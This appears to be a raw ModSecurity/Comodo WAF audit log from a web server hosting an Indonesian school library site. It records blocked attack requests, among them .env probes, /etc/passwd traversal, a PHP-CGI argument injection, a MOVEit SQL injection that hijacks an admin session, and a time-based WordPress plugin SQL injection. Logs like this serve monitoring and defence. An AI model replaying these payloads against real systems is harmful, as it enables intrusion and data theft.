--c433af6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c433af6d-E-- --c433af6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748361877412937 3772 (- - -) Stopwatch2: 1748361877412937 3772; combined=1760, p1=525, p2=1203, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c433af6d-Z-- --be4dcb53-A-- [27/May/2025:23:25:11 +0700] aDXnZ96cNBpj1JOkpQllBgAAAE4 103.236.140.4 46686 103.236.140.4 8181 --be4dcb53-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 Accept-Charset: utf-8 --be4dcb53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be4dcb53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748363111629563 782 (- - -) Stopwatch2: 1748363111629563 782; combined=315, p1=278, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be4dcb53-Z-- --cfec410e-A-- [27/May/2025:23:38:45 +0700] aDXqlVuSH_Spa4YU2Zm-bAAAAMs 103.236.140.4 50238 103.236.140.4 8181 --cfec410e-B-- POST /userentry?accountId=/../../../tomcat/webapps/4IQWb/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159947011 --cfec410e-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --cfec410e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfec410e-E-- --cfec410e-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748363925436456 4135 (- - -) Stopwatch2: 1748363925436456 4135; combined=2475, p1=470, p2=1906, p3=0, p4=0, p5=99, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfec410e-Z-- --511f4433-A-- [27/May/2025:23:47:53 +0700] aDXsuWTuEZUBy5rh0saUUQAAAAI 103.236.140.4 50290 103.236.140.4 8181 --511f4433-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2876.0 Safari/537.36 Accept-Charset: utf-8 --511f4433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --511f4433-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748364473706408 779 (- - -) Stopwatch2: 1748364473706408 779; combined=315, p1=274, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --511f4433-Z-- --dbf9452f-A-- [27/May/2025:23:55:38 +0700] aDXuiluSH_Spa4YU2Zm-nwAAAM4 103.236.140.4 50532 103.236.140.4 8181 --dbf9452f-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159947029 --dbf9452f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dbf9452f-E-- --dbf9452f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748364938866026 2243 (- - -) Stopwatch2: 1748364938866026 2243; combined=607, p1=445, p2=131, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbf9452f-Z-- --ec75c014-A-- [28/May/2025:00:03:32 +0700] aDXwZN6cNBpj1JOkpQlnIwAAAEg 103.236.140.4 50576 103.236.140.4 8181 --ec75c014-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --ec75c014-C-- --ec75c014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec75c014-E-- --ec75c014-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748365412387968 3511 (- - -) Stopwatch2: 1748365412387968 3511; combined=1941, p1=469, p2=1439, p3=0, p4=0, p5=32, sr=94, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec75c014-Z-- --c9ed6912-A-- [28/May/2025:00:03:53 +0700] aDXwed6cNBpj1JOkpQlnJQAAAFg 103.236.140.4 50580 103.236.140.4 8181 --c9ed6912-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=if0f3gcrssvs5dtsfnsd36gdkp X-Varnish: 159947041 --c9ed6912-C-- --c9ed6912-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9ed6912-E-- --c9ed6912-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748365433396777 2527 (- - -) Stopwatch2: 1748365433396777 2527; combined=1352, p1=357, p2=967, p3=0, p4=0, p5=27, sr=63, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9ed6912-Z-- --9b09d44f-A-- [28/May/2025:00:03:58 +0700] aDXwft6cNBpj1JOkpQlnJwAAAFU 103.236.140.4 50590 103.236.140.4 8181 --9b09d44f-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdnTC3Nxx4RVav86ifkRYMLZwI');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=if0f3gcrssvs5dtsfnsd36gdkp X-Varnish: 168684582 --9b09d44f-C-- --9b09d44f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b09d44f-E-- --9b09d44f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748365438400924 3396 (- - -) Stopwatch2: 1748365438400924 3396; combined=1670, p1=497, p2=1143, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b09d44f-Z-- --add66201-A-- [28/May/2025:00:22:25 +0700] aDX00VuSH_Spa4YU2Zm_FAAAANU 103.236.140.4 51128 103.236.140.4 8181 --add66201-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.102.43.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.102.43.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --add66201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --add66201-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748366545671265 3240 (- - -) Stopwatch2: 1748366545671265 3240; combined=1438, p1=488, p2=919, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --add66201-Z-- --ba189432-A-- [28/May/2025:00:24:31 +0700] aDX1T96cNBpj1JOkpQlnUwAAAEE 103.236.140.4 51134 103.236.140.4 8181 --ba189432-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba189432-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba189432-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748366671937891 2893 (- - -) Stopwatch2: 1748366671937891 2893; combined=1325, p1=452, p2=844, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba189432-Z-- --441cd516-A-- [28/May/2025:00:46:57 +0700] aDX6kRLFq2VRfSzm6b8oPwAAAIQ 103.236.140.4 51546 103.236.140.4 8181 --441cd516-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.14.249.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.14.249.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --441cd516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --441cd516-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368017226804 2358 (- - -) Stopwatch2: 1748368017226804 2358; combined=1136, p1=357, p2=749, p3=0, p4=0, p5=29, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --441cd516-Z-- --eba11e51-A-- [28/May/2025:00:48:23 +0700] aDX65xLFq2VRfSzm6b8oQgAAAI8 103.236.140.4 51554 103.236.140.4 8181 --eba11e51-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168684773 --eba11e51-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --eba11e51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eba11e51-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368103619079 2798 (- - -) Stopwatch2: 1748368103619079 2798; combined=1519, p1=359, p2=1132, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eba11e51-Z-- --81ab7475-A-- [28/May/2025:00:48:24 +0700] aDX66N6cNBpj1JOkpQlnbQAAAEE 103.236.140.4 51560 103.236.140.4 8181 --81ab7475-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159947250 --81ab7475-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --81ab7475-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368104410915 14730 (- - -) Stopwatch2: 1748368104410915 14730; combined=26155, p1=385, p2=419, p3=0, p4=0, p5=12689, sr=67, sw=0, l=0, gc=12662 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81ab7475-Z-- --80134e79-A-- [28/May/2025:01:03:10 +0700] aDX-Xt6cNBpj1JOkpQlpMwAAAFg 103.236.140.4 55548 103.236.140.4 8181 --80134e79-B-- POST /userentry?accountId=/../../../tomcat/webapps/4IQWb/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160765150 --80134e79-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --80134e79-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80134e79-E-- --80134e79-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368990418262 4395 (- - -) Stopwatch2: 1748368990418262 4395; combined=2526, p1=469, p2=2026, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 